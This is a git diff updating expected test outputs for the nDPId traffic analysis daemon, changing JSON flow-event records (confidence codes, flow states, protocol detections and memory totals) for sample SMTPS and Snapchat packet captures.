+00918{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4,"source":"smtps.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1614938504972,"flow_last_seen":1614938505439,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":174,"midstream":0,"thread_ts_msec":1614938505439,"l3_proto":"ip4","src_ip":"62.43.36.99","dst_ip":"21.65.95.132","src_port":37682,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"SMTPS","breed":"Safe","category":"Email"}} 
00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":4,"source":"smtps.pcapng","alias":"nDPId-test","packets-captured":4,"packets-processed":4,"total-skipped-flows":0,"total-l4-payload-len":696,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1614938505439} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 4/4 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871615 bytes -~~ total memory freed........: 5871615 bytes -~~ total allocations/frees...: 118120/118120 +~~ total memory allocated....: 6005249 bytes +~~ total memory freed........: 6005249 bytes +~~ total allocations/frees...: 120882/120882 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 463 chars ~~ json string max len.......: 1151 chars diff --git a/test/results/snapchat.pcap.out b/test/results/snapchat.pcap.out index a3a634613..8eb833951 100644 --- a/test/results/snapchat.pcap.out +++ b/test/results/snapchat.pcap.out 
@@ -4,8 +4,8 @@ 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1431417993318,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431417993318,"pkt":"ABoRAAACABoRAAABCABFAAA8f1tAAEAG3k0KCAABSn2IjYHRAbtgYhiTAAAAAKAC\/\/8GegAAAgQFtAQCCAoAKmfIAAAAAAEDAwY="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1431417993319,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431417993319,"pkt":"ABoRAAACABoRAAABCABFAAAoAalAABAGjBRKfYiNCggAAQG7gdGfnedsYGIYlFAS\/\/9PMgAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1431417993322,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431417993322,"pkt":"ABoRAAACABoRAAABCABFAAAof1xAAEAG3mAKCAABSn2IjYHRAbtgYhiUn53nbVAQ\/\/9PMwAA"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431417993318,"flow_last_seen":1431417993373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1431417993373,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": 
{"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01108{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431417993318,"flow_last_seen":1431417993476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1431417993476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431417993318,"flow_last_seen":1431417993373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1431417993373,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01108{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431417993318,"flow_last_seen":1431417993476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":363,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1431417993476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"fbe78c619e7ea20046131294ad087f05","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431418008131,"flow_last_seen":1431418008131,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431418008131,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1431418008131,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431418008131,"pkt":"ABoRAAACABoRAAABCABFAAA8OQ1AAEAGJJwKCAABSn2Ija34AbvuolTmAAAAAKAC\/\/8JnAAAAgQFtAQCCAoAKm3rAAAAAAEDAwY="} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1431418008132,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008132,"pkt":"ABoRAAACABoRAAABCABFAAAoAeJAABAGi9tKfYiNCggAAQG7rfgRXasZ7qJU51AS\/\/8jCwAA"} 
@@ -14,13 +14,13 @@ 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1431418008135,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008135,"pkt":"ABoRAAACABoRAAABCABFAAAoAeRAABAGi9lKfYiNCggAAQG724HUfVLFK4KtO1AS\/\/\/1gQAA"} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1431418008135,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008135,"pkt":"ABoRAAACABoRAAABCABFAAAoOQ5AAEAGJK8KCAABSn2Ija34AbvuolTnEV2rGlAQ\/\/8jDAAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1431418008136,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431418008136,"pkt":"ABoRAAACABoRAAABCABFAAAowNJAAEAGnOoKCAABSn2IjduBAbsrgq071H1SxlAQ\/\/\/1ggAA"} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008131,"flow_last_seen":1431418008138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008138,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008133,"flow_last_seen":1431418008141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008141,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008131,"flow_last_seen":1431418008294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008133,"flow_last_seen":1431418008294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1431417993318,"flow_last_seen":1431417995589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1671,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431418008133,"flow_last_seen":1431418008853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1069,"flow_tot_l4_payload_len":3005,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431418008131,"flow_last_seen":1431418008701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2439,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008131,"flow_last_seen":1431418008138,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008138,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00860{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1431418008133,"flow_last_seen":1431418008141,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1431418008141,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":33,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008131,"flow_last_seen":1431418008294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
+00914{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":34,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1431418008133,"flow_last_seen":1431418008294,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":669,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1431418008294,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"feelinsonice-hrd.appspot.com","ja3":"fded31ac9b978e56ce306f8056092f2a","ja3s":"7bee5c1d424b7e5f943b06983bb11422","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +00928{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1431417993318,"flow_last_seen":1431417995589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1671,"flow_avg_l4_payload_len":75,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":33233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1431418008133,"flow_last_seen":1431418008853,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1069,"flow_tot_l4_payload_len":3005,"flow_avg_l4_payload_len":176,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":56193,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1431418008131,"flow_last_seen":1431418008701,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2439,"flow_avg_l4_payload_len":143,"midstream":0,"thread_ts_msec":1431418008853,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"74.125.136.141","src_port":44536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Snapchat","breed":"Fun","category":"SocialNetwork"}} 00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":56,"source":"snapchat.pcap","alias":"nDPId-test","packets-captured":56,"packets-processed":56,"total-skipped-flows":0,"total-l4-payload-len":7115,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1431418008853} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ 
~~ packets captured/processed: 56/56 @@ -30,9 +30,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5879357 bytes -~~ total memory freed........: 5879357 bytes -~~ total allocations/frees...: 118184/118184 +~~ total memory allocated....: 6012991 bytes +~~ total memory freed........: 6012991 bytes +~~ total allocations/frees...: 120946/120946 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 456 chars ~~ json string max len.......: 1113 chars diff --git a/test/results/snapchat_call.pcapng.out b/test/results/snapchat_call.pcapng.out index 55cb367a1..f98300255 100644 --- a/test/results/snapchat_call.pcapng.out +++ b/test/results/snapchat_call.pcapng.out 
@@ -2,11 +2,12 @@ 00555{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"snapchat_call.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1595865799020} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595865799020,"flow_last_seen":1595865799020,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1595865799020,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02245{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1595865799020,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1595865799020,"pkt":"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"} 
-00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595865799020,"flow_last_seen":1595865799020,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1595865799020,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {}} +00802{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"snapchat_call.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1595865799020,"flow_last_seen":1595865799020,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1595865799020,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"18.184.138.142","src_port":42083,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"24": {"risk":"Missing SNI TLS Extn","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {}} 
